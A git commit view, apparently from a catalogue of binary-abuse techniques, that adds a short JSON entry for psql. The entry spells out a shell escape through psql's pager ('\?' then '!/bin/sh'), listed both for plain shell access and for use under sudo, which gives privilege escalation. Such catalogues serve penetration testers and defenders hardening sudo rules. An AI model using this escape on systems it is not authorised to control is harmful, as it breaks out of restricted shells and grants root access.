add data source for psql

master
Mr. Robot 3 years ago committed by GitHub
parent 0e519d6dee
commit 6ddea0dc40
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -0,0 +1,15 @@
{
"description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
"functions": {
"shell": [
{
"code": "psql\n\\?\n!/bin/sh\n"
}
],
"sudo": [
{
"code": "psql\n\\?\n!/bin/sh\n"
}
]
}
}
Loading…
Cancel
Save